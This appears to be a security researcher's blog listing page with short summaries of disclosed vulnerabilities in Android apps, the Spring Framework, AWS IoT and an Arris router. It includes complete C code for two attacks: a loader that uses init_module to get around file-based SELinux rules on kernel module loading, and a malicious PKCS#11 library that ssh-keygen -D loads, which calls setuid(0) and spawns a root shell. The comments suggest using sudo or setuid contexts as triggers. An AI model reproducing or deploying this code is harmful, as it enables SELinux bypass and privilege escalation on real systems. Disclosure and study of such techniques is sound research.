Thursday, September 19, 2024

Exploiting Android Client WebViews with Help from HSTS

TL;DR


I discovered a one-click account takeover vulnerability in a popular Indonesian Android app called Tokopedia. The chain involves URI parsing issues and custom WebViews, but ultimately it was only exploitable using a payload hosted on a web domain in Google's HSTS preload list. This blog post explores the vulnerability in detail and serves as the public reveal of my free HSTS+HTTPS Redirection service, a useful tool for exploiting URL-parsing vulnerabilities on Android.


Monday, May 20, 2024

[CVE-2024-22243] URL Parsing Vulnerability in Spring Framework

TL;DR


During a routine pentest of a proprietary implementation, I discovered a URL-parsing vulnerability in the Spring Framework that facilitates host confusion, potentially resulting in an open redirect or server-side request forgery (SSRF). The finding has been officially designated CVE-2024-22243. Additionally, I created an intentionally vulnerable example implementation to demonstrate how this vulnerability might be exploited, as well as some Semgrep rules to help developers scan their code for potentially vulnerable patterns.

Tuesday, November 7, 2023

AWS IoT Core: A Compromised Device Perspective

TL;DR


I recently spent some time exploring the potential capabilities that an evil IoT device might have within an AWS IoT Core environment. This culminated in the thoughts I've transcribed in this blog post, as well as a command-line tool to help with enumeration and data harvesting during security assessments of products that interact with AWS IoT Core.

Friday, May 26, 2023

Bypassing SELinux with init_module

TL;DR


There are two Linux system calls for loading a kernel module: init_module, which takes the module image from a user-space memory buffer, and finit_module, which takes an open file descriptor. By leveraging init_module, I bypassed a filesystem-based SELinux rule that prevented me from loading a kernel module through traditional means (e.g., insmod, which uses finit_module). I then disabled SELinux from kernel space. Proof of concept code can be found on my GitHub.
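The difference between the two syscalls is easiest to see in code. The following is an added example written for this page, not the proof of concept from the author's GitHub: it reads a module image into an anonymous heap buffer and hands it to init_module(2), so the kernel never receives a file to attribute the load to, and a policy that keys on the file's label has nothing to match. A finit_module(2) loader (what insmod does) is included beside it for comparison. Linux only; loading a real module additionally requires CAP_SYS_MODULE, and a denial shows up as EPERM or EACCES from the syscall.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

/* glibc prototype for the raw syscall wrapper (declared here so the file
 * compiles even if _GNU_SOURCE was not in effect for <unistd.h>). */
long syscall(long number, ...);

/* Read the whole file at `path` into a malloc'd buffer.
 * Returns the buffer (caller frees) and sets *len, or NULL with errno set. */
void *read_image(const char *path, size_t *len)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return NULL;

    struct stat st;
    if (fstat(fd, &st) < 0) {
        close(fd);
        return NULL;
    }

    size_t size = (size_t)st.st_size;
    char *buf = malloc(size ? size : 1);
    if (!buf) {
        close(fd);
        return NULL;
    }

    size_t got = 0;
    while (got < size) {
        ssize_t n = read(fd, buf + got, size - got);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0) {            /* short file or read error */
            free(buf);
            close(fd);
            errno = EIO;
            return NULL;
        }
        got += (size_t)n;
    }
    close(fd);
    *len = size;
    return buf;
}

/* Load a module the init_module(2) way: the kernel only ever sees bytes in
 * our address space, not the file they came from.
 * Returns 0 on success, -1 with errno set (ENOENT, EPERM, EACCES, ENOEXEC...). */
int load_module_from_memory(const char *path, const char *params)
{
    size_t len = 0;
    void *img = read_image(path, &len);
    if (!img)
        return -1;

    long rc = syscall(SYS_init_module, img, (unsigned long)len,
                      params ? params : "");
    int saved = errno;
    free(img);
    if (rc < 0) {
        errno = saved;
        return -1;
    }
    return 0;
}

/* Load a module the insmod way: finit_module(2) receives the file descriptor,
 * so file-based LSM/SELinux checks can be applied to the module file itself. */
int load_module_from_fd(const char *path, const char *params)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    long rc = syscall(SYS_finit_module, fd, params ? params : "", 0);
    int saved = errno;
    close(fd);
    if (rc < 0) {
        errno = saved;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s module.ko [params]\n", argv[0]);
        return 2;
    }
    if (load_module_from_memory(argv[1], argc > 2 ? argv[2] : "") != 0) {
        perror("init_module");
        return 1;
    }
    puts("module loaded via init_module");
    return 0;
}
```

The buffer need not come from a file at all: anything that can get the ELF bytes into memory (a pipe, a socket, an embedded blob) works, which is exactly why a rule written against the module's on-disk label does not cover this path.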

Thursday, March 9, 2023

Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation)

TL;DR


The -D flag of ssh-keygen takes the path of a PKCS#11 provider and loads it as a shared library, so any library you can point it at gets executed in the ssh-keygen process. This can be useful for privilege escalation (described below), or for turning an argument injection, file overwrite, etc. into arbitrary code execution. Proof of concept code can be found on my GitHub (and here is a list of other tools that can be leveraged in the same way).
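A minimal library that abuses this, as an added example written for this page rather than the author's proof of concept: an ELF constructor fires from dlopen() before ssh-keygen ever looks up C_GetFunctionList, so the file does not need to be a working PKCS#11 module. The names (evil_pkcs11.c, the target check) are this example's own. The constructor only runs the payload when the host process is ssh-keygen (read from /proc/self/exe, so Linux only), which keeps the library quiet if something else loads it; drop that check to fire in any host. If the effective UID is root but the real UID is not (a setuid or sudo-launched context), setuid(0) makes the privilege permanent before the shell is spawned.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Build:   cc -shared -fPIC -o evil_pkcs11.so evil_pkcs11.c
 * Trigger: ssh-keygen -D ./evil_pkcs11.so
 * (or, when sudo/cron/a setuid wrapper runs ssh-keygen for you, point -D at
 * this file via whatever argument injection or file write you have). */

/* Return 1 if the process image is ssh-keygen (compared by basename). */
int target_matches(const char *exe_path)
{
    const char *base = strrchr(exe_path, '/');
    base = base ? base + 1 : exe_path;
    return strcmp(base, "ssh-keygen") == 0;
}

/* Return 1 if we hold root only as an effective UID and must call setuid(0)
 * before exec'ing a shell, otherwise the shell would drop back to `ruid`. */
int needs_setuid(uid_t ruid, uid_t euid)
{
    return euid == 0 && ruid != 0;
}

/* The payload: replace the host process with a shell at the current privilege. */
static void payload(void)
{
    uid_t ruid = getuid(), euid = geteuid();
    fprintf(stderr, "[evil_pkcs11] loaded into pid %d (uid=%d euid=%d)\n",
            (int)getpid(), (int)ruid, (int)euid);

    if (needs_setuid(ruid, euid) && setuid(0) != 0) {
        perror("setuid");
        return;
    }
    execl("/bin/sh", "sh", NULL);   /* only returns on failure */
    perror("execl");
}

/* Runs inside dlopen(); ssh-keygen has not yet validated anything about us. */
__attribute__((constructor)) static void on_load(void)
{
    char exe[4096];
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    if (n < 0)
        return;                     /* no /proc: stay silent */
    exe[n] = '\0';
    if (!target_matches(exe))
        return;                     /* loaded by something other than ssh-keygen */
    payload();
}
```

The same constructor trick works for any tool that dlopen()s a user-supplied path; the ssh-keygen specifics here are only the -D flag and the basename check.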

Friday, November 4, 2022

[CVE-2022-45028] Unauthenticated Stored XSS in the Arris NVG443B

Update: I reported this vulnerability to MITRE on November 4th, 2022. It has been assigned CVE-2022-45028 with a CVSS score of 6.1 (Medium).

Tuesday, October 25, 2022

Adding Support for a Flash Chip in FlashcatUSB

Flash Programmers for Dumping Firmware

Black-box IoT device hacking can be frustrating without any insight into the underlying software implementation(s). For this reason, I usually try to obtain a copy of the device firmware to extract the bootloader, kernel, root filesystem, and any other information that might inform run-time testing and targeted reverse engineering. Unfortunately, device vendors don't always provide access to firmware packages, and even when they do, the firmware blobs can be encrypted or obfuscated in a way that makes them useless without knowledge of the packaging format. Luckily there's another way to obtain device firmware: you can try to dump it directly from device storage (usually a dedicated flash chip).